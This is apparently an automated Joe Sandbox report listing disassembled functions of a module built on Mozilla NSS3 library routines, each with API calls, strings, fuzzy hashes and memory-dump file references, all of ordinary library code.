String ID:
API String ID: 3365241057-0
Opcode ID: 58421e2418bd860410f3df5b5d8a847f61bbc6f05f4ac3fb5c51cc556d617ee5
Instruction ID: 4a47a2addbee36c7bab2c953f35f5683d951dc9f21b61c441c46af68563ff56c
Opcode Fuzzy Hash: 58421e2418bd860410f3df5b5d8a847f61bbc6f05f4ac3fb5c51cc556d617ee5
Instruction Fuzzy Hash: 57013CF6B04201ABDB055F65EC0089676A1BB1226C7154378F82647BF1EB22ED29C78A

Function 6C58AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C58AFDA

Strings

%s at line %d of [%.10s], xrefs: 6C58AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C58AFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6C58AF5C
misuse, xrefs: 6C58AFCE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 603b4e69ec66919b72f30a577ada92ae9979ba9b74ea07b301e5e7fd2f188106
Instruction ID: 1a5acf06791e62a10eabc833ec9019cd6618cd9a05f717039a45c218fd25156b
Opcode Fuzzy Hash: 603b4e69ec66919b72f30a577ada92ae9979ba9b74ea07b301e5e7fd2f188106
Instruction Fuzzy Hash: A191F2B5B062258FDB04CF29CC50BAAB7F1BF49314F1948A8E864AB791D734EC01CB60

Function 6C5EFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C5EFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5EFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5EFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C5EFDDE

Part of subcall function 6C5F8800: TlsGetValue.KERNEL32(?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F8821
Part of subcall function 6C5F8800: TlsGetValue.KERNEL32(?,?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F883D
Part of subcall function 6C5F8800: EnterCriticalSection.KERNEL32(?,?,?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F8856
Part of subcall function 6C5F8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5F8887
Part of subcall function 6C5F8800: PR_Unlock.NSS3(?,?,?,?,6C60085A,00000000,?,6C5A8369,?), ref: 6C5F8899

Strings

pkcs11:, xrefs: 6C5EFC4F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 3acde7c44536d6570229f3653320f3760656229b59653b98da6e6b28d9e14846
Instruction ID: 6e6eb502b9ef58ea0a0cb9de354ed22ad793782783f3fe77b91a3d8510c39264
Opcode Fuzzy Hash: 3acde7c44536d6570229f3653320f3760656229b59653b98da6e6b28d9e14846
Instruction Fuzzy Hash: D051F4B2B04111EBEF008F65BE40B9A3B65AF89358F250625ED195BB41EF31ED05CB92

Function 6C52BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C52BE02

Part of subcall function 6C659C40: memcmp.VCRUNTIME140(?,00000000,6C52C52B), ref: 6C659D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52BE9F

Strings

%s at line %d of [%.10s], xrefs: 6C52BE98
database corruption, xrefs: 6C52BE93
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52BE89

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 96c2b5d4fb11188a6194a8e863f1823fc792b2e115a40f67cc3e07dd8b02abfe
Instruction ID: 0f63b04487994cd9bc6ef018173996912f6e5964ba9985d299f262e2baecce55
Opcode Fuzzy Hash: 96c2b5d4fb11188a6194a8e863f1823fc792b2e115a40f67cc3e07dd8b02abfe
Instruction Fuzzy Hash: 3C315731A042558BC700EF29CCD4AABBBE2AF41314B098954EE9A1BAC1D338EC15C7D1

Function 6C616DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C616E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C616E57

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C616E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C616EAA

Strings

nkl, xrefs: 6C616DF9

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nkl
API String ID: 3163584228-1663185687
Opcode ID: 2c59c3d2dd61b8508c2788cfab1112bed4642bb5f1b6bc5eb9190b46a547c955
Instruction ID: 53302a4f2651789e1aa30105fa5bf962da70c0b834b33d557874e74ad307b530
Opcode Fuzzy Hash: 2c59c3d2dd61b8508c2788cfab1112bed4642bb5f1b6bc5eb9190b46a547c955
Instruction Fuzzy Hash: 7D31A07A61C612EEDB141F38C804396BBA4EB0231BF14473CD89AD6E40EB31E555CB89

Function 6C5A1EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1EE2

Part of subcall function 6C601820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C5A1D97,?,?), ref: 6C601836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1F13
DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1F37
DER_DecodeTimeChoice_Util.NSS3(?,dLZl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5A4C64,?,-00000004), ref: 6C5A1F53

Strings

dLZl, xrefs: 6C5A1F2B, 6C5A1F51

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID: dLZl
API String ID: 3216063065-3905966913
Opcode ID: 94e797969a49bc842c89776170e7a2f3e5f664de508fd9b14976fb35da99e37d
Instruction ID: bc0eeb06e0073cc1090dc6a6575595d778be5a92878e9b33973db079c776c616
Opcode Fuzzy Hash: 94e797969a49bc842c89776170e7a2f3e5f664de508fd9b14976fb35da99e37d
Instruction Fuzzy Hash: 9F218371504245EBC700CF66DD00A9B77E9AB89659F000929E854D3A40F330EA19C7A6

Function 6C590DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C590BDE), ref: 6C590DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C590BDE), ref: 6C590DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C590BDE), ref: 6C590DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C590BDE), ref: 6C590E32

Strings

%s incr => %d (find lib), xrefs: 6C590E2D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 2d796d744ce34cf35ee190b5c23aa299f00306cedecff8cb0bdaad57cebc36f2
Instruction ID: 9db72e22e582cad7d01ca0a2ac5624761241967d030c46a04b3c1eee8f8f6bb7
Opcode Fuzzy Hash: 2d796d744ce34cf35ee190b5c23aa299f00306cedecff8cb0bdaad57cebc36f2
Instruction Fuzzy Hash: 42012872B003509FE7209F249C45E1773BCDB89608B0448BEE905D7741E762FC1887E5

Function 6C5D1CC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C5D1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C5D1CF1

Part of subcall function 6C6B09D0: PR_Now.NSS3 ref: 6C6B0A22
Part of subcall function 6C6B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C6B0A35
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C6B0A66
Part of subcall function 6C6B09D0: PR_GetCurrentThread.NSS3 ref: 6C6B0A70
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C6B0A9D
Part of subcall function 6C6B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C6B0AC8
Part of subcall function 6C6B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C6B0AE8
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0B19
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0B48
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0C76
Part of subcall function 6C6B09D0: PR_LogFlush.NSS3 ref: 6C6B0C7E

Strings

pInitArgs = 0x%p, xrefs: 6C5D1CEC
nkl, xrefs: 6C5D1D09, 6C5D1D30
C_Initialize, xrefs: 6C5D1CD3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize$nkl
API String ID: 1907330108-2703718790
Opcode ID: 6d68bde7d0081168be7901f9d5b6a938a067e6789e586d9003b1015084de75f4
Instruction ID: b206d2ef4a6c115ee050a640e0ea56f4a0b972040cb9a2eb844a434bd96d9b1e
Opcode Fuzzy Hash: 6d68bde7d0081168be7901f9d5b6a938a067e6789e586d9003b1015084de75f4
Instruction Fuzzy Hash: E1018CB6301284DFDB00AF68DD49B5637B5ABC637AF0A4439E409D3611DF30E849CB96

Function 6C64AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]cl,00000000,?,?,6C626AC6,?), ref: 6C64AC2D

Part of subcall function 6C5EADC0: TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE10
Part of subcall function 6C5EADC0: EnterCriticalSection.KERNEL32(?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE24
Part of subcall function 6C5EADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C5CD079,00000000,00000001), ref: 6C5EAE5A
Part of subcall function 6C5EADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE6F
Part of subcall function 6C5EADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE7F
Part of subcall function 6C5EADC0: TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEB1
Part of subcall function 6C5EADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEC9

PK11_FreeSymKey.NSS3(?,@]cl,00000000,?,?,6C626AC6,?), ref: 6C64AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]cl,00000000,?,?,6C626AC6,?), ref: 6C64AC59
free.MOZGLUE(8CB6FF01,6C626AC6,?,?,?,?,?,?,?,?,?,?,6C635D40,00000000,?,6C63AAD4), ref: 6C64AC62

Strings

@]cl, xrefs: 6C64AC05

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]cl
API String ID: 1595327144-3571462101
Opcode ID: c09de5e320b13dc9dadb510e6b3ce113994b6161d42b8c91490edef823786580
Instruction ID: 9b34317fe4d34a89351518eff80673d40777fe459f83d8b11cc0f079269311bb
Opcode Fuzzy Hash: c09de5e320b13dc9dadb510e6b3ce113994b6161d42b8c91490edef823786580
Instruction Fuzzy Hash: 01012CB5600204ABDB10DF25E9C0B567BA8AB44758F18C068E9498FB06D731E854CBA5

Function 6C539C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C539CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C539D45
EnterCriticalSection.KERNEL32(?), ref: 6C539D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C539DDE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 5789a2dd2b7caa4c81c14442ba8ef88c88b5f70a1c048583c33993b411ccb92b
Instruction ID: 8437df01a6a6f763d8fa1477b8eed961159ef980e1fe7d43551a3428484b7b39
Opcode Fuzzy Hash: 5789a2dd2b7caa4c81c14442ba8ef88c88b5f70a1c048583c33993b411ccb92b
Instruction Fuzzy Hash: 67A1AEB17041108BEB09DF25EC89B6E3B72BB93318F18152DE41A87A40EF399845DB96

Function 6C5C1E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C5C1ECC

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

TlsGetValue.KERNEL32 ref: 6C5C1EDF
EnterCriticalSection.KERNEL32(?), ref: 6C5C1EEF
PR_ExitMonitor.NSS3(?), ref: 6C5C1F37
PR_Unlock.NSS3(?), ref: 6C5C1F44

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 0b6064993f5442886ded65b38be4783812594991dc6667738fe708ecf276d99a
Instruction ID: 7b05cba667eece2f471de54c04da9f1cbd4a4ea4eff42b986db51a0bee827644
Opcode Fuzzy Hash: 0b6064993f5442886ded65b38be4783812594991dc6667738fe708ecf276d99a
Instruction Fuzzy Hash: 26718AB5A043019FD700CF65DC40A5BBBF1BF89358F14492DE89993A21E731E958CBA3

Function 6C64DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C64DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C64DE77

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 30391e5a4dfa781e757943f246367fbab968566002d0009e076694ff8dad5b11
Instruction ID: 3bf72d44aed04855442c7ef4df9d82ce57ed3ebb61e156f3ccf6deb61632be4b
Opcode Fuzzy Hash: 30391e5a4dfa781e757943f246367fbab968566002d0009e076694ff8dad5b11
Instruction Fuzzy Hash: 84716571E00314CBDB20CF9AC5C0A89B7B5BF8A718F25C16DD9596B742DB30A906CF84

Function 6C5CBE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C5CBF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CBF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A9F71,?,?,00000000), ref: 6C5CBF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5CBFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5CC014

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 8aa98edbc51640dc3b0935e2d826cff68f3d075710f9772f9fef96fef7693539
Instruction ID: b80a1077d460f7820cdf43f80c55fc5af7966a537a3c88439e57d45c9a560be6
Opcode Fuzzy Hash: 8aa98edbc51640dc3b0935e2d826cff68f3d075710f9772f9fef96fef7693539
Instruction Fuzzy Hash: FD41B475B012059BEB00DEA6CC40BBE77B9AF85248F15412CE919E7B41FB31E945CBE2

Function 6C59EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C59EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C59EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C59EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C59EEEB
free.MOZGLUE(?), ref: 6C59EEF6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 390e4d8adf75fc8d10fae67e71e290060d5cd397c559c37b47fc217dc5f98bab
Instruction ID: 6fd23d3d70196a9cbeaf145f8cf79f16233cdadc123f6297f9af6adb2e870885
Opcode Fuzzy Hash: 390e4d8adf75fc8d10fae67e71e290060d5cd397c559c37b47fc217dc5f98bab
Instruction Fuzzy Hash: DE313AB1A00280ABEB209F2DCC44B667BF4FB46314F1409BDE95A87B50DB71E814CBD5

Function 6C5B1F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B1F1C

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
